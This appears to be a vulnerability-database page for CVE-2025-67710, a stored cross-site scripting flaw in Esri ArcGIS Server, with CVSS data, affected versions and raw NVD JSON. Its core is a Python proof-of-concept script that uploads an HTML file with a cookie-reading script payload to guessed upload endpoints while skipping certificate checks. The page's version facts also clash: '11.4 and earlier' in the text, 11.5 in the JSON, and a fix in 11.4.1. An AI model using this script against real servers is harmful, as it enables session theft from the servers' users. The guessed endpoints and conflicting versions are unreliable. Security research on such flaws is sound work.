Security Vulnerability Report
中文
CVE-2025-67710 CVSS 6.1 MEDIUM

CVE-2025-67710

Published: 2025-12-31 23:15:42
Last Modified: 2026-01-06 19:04:06
Source: [email protected]

Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Esri ArcGIS Server 11.4 (Windows/Linux)
Esri ArcGIS Server 11.3 (Windows/Linux)
Esri ArcGIS Server 11.2 (Windows/Linux)
Esri ArcGIS Server 11.1 (Windows/Linux)
Esri ArcGIS Server 11.0 (Windows/Linux)
Esri ArcGIS Server 10.9.x (Windows/Linux)
Esri ArcGIS Server 10.8.x (Windows/Linux)
Esri ArcGIS Server <= 11.4的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67710 PoC - Esri ArcGIS Server Stored XSS # Description: Stored XSS in Esri ArcGIS Server 11.4 and earlier # CVSS: 6.1 (MEDIUM) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N import requests import urllib3 urllib3.disable_warnings() TARGET = "https://vulnerable-arcgis-server.com/arcgis" PAYLOAD = "<script>alert(document.cookie)</script>" def exploit_stored_xss(): """ Exploit for CVE-2025-67710: Stored XSS in Esri ArcGIS Server This PoC demonstrates uploading a file with malicious JavaScript content """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/octet-stream', } # Malicious file content containing XSS payload malicious_content = f''' <html> <body> <h1>Map Configuration File</h1> {PAYLOAD} <p>Please enable JavaScript to view this content.</p> </body> </html> ''' # Try to upload malicious file to ArcGIS Server upload_endpoints = [ f"{TARGET}/rest/services/Upload", f"{TARGET}/admin/uploads/upload", f"{TARGET}/server/uploads/upload", ] print(f"[*] Target: {TARGET}") print(f"[*] Payload: {PAYLOAD}") print(f"[*] Attempting to upload malicious file...") for endpoint in upload_endpoints: try: response = requests.post( endpoint, data=malicious_content.encode(), headers=headers, verify=False, timeout=30 ) if response.status_code in [200, 201, 202]: print(f"[+] Successfully uploaded to: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Failed to upload to {endpoint}: {e}") print("[*] Note: Actual exploitation may require specific authentication or configuration") print("[*] Please verify the target is running a vulnerable version (11.4 or earlier)") return False def check_version(): """Check ArcGIS Server version""" try: version_url = f"{TARGET}/server/sdk/rest/index.html" response = requests.get(version_url, verify=False, timeout=10) print(f"[*] Server responded with status: {response.status_code}") except: print("[*] Could not determine version") if __name__ == "__main__": print("="*60) print("CVE-2025-67710 PoC - Esri ArcGIS Server Stored XSS") print("="*60) check_version() exploit_stored_xss() print("\n[*] Mitigation: Upgrade to ArcGIS Server 11.4.1 or later")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67710", "sourceIdentifier": "[email protected]", "published": "2025-12-31T23:15:42.270", "lastModified": "2026-01-06T19:04:06.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser."}, {"lang": "es", "value": "Hay un problema de scripting entre sitios almacenado en Esri ArcGIS Server 11.4 y versiones anteriores en Windows y Linux que en algunas configuraciones permite a un atacante remoto no autenticado almacenar archivos que contienen código malicioso que puede ejecutarse en el contexto del navegador de una víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.5", "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.